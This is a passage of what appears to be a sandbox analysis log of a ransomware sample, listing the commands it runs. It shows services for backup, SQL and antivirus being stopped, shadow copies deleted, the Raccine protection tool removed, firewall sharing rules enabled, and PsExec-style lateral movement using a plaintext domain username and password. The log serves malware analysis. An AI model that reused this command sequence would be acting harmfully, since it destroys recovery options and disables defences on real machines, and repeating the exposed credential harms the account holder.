      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:5600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:4012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5716
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5332
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:4460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:6060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:4116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4412
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4932
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5368
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:6128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:4780
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5676
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5736
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5652
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4824
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4760
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5900
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4700
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5764
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3892
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5540
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4904
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3672
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3628
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4892
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5684
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1540
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4008
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5896
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6076
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.33 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:4816
- C:\Users\Admin\AppData\Local\Temp\p0512le1.exe
  "C:\Users\Admin\AppData\Local\Temp\p0512le1.exe" \10.10.0.33 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
  2⤵
  PID:4768
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4284
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:2660
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1388
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4380
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:4584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
  2⤵
  PID:2060
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:3884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:4472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:2708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4940

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4300
- C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
  "47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
  2⤵
  PID:3364
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:4200
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4628
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:1304
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4216
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4344
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5984
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4312
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5740
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5596
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4424
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4580
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:2508
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:5764
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:5064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:5860
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:4508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:260
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5232
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:4288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:272
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:5132
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4844
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:4776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:5480
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:4964
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:5500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:5312
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:4184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:4908
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:5128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:4504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:4864
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:5908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:5964
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:5608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:4984
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:4372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5488
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:4192
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:2328
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:5072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:4256
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:212
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:5412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:5536
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:4812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:1616
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1088
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:1440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:5020
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:1224
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:4792
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:2032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:2732
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:2828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:4188
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:5844
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:4448
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:3148
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:4828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:2096
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:2744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:5712
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:2604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:4408
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:4528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:5936
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:4316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:2168
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:4716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:2956
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:4100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:4840
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:5000
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:5368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:6120
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:5612
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:4692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:4592
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:5668
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:5124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:5284
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:5212
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:3628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:5628
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:5828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:5784
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:5144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:5880
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:5048
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:5788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:2712
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:5524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:5012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sms_site_sql_backup /y
        5⤵
        
        PID:8
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:2184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:5644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:5760
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:5536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:5412
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:2508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:4672
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:5812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:484
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:2708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:1048
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:3236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:5252
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:5860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:4604
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:4376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:5176
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:2272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:4400
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MySQL57 /y
        5⤵
        
        PID:5500
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:5328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:6044
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:4300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:204
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2172
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:4756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4404
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:5032
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:5392
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:4852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5700
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:1724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:5544
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:4520
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:4168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:1264
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4212
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:6064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:4980
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5652
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:3876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:4608
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:5676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:4592
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:5836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:5068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:5336
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:5508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:5840
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:1448
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
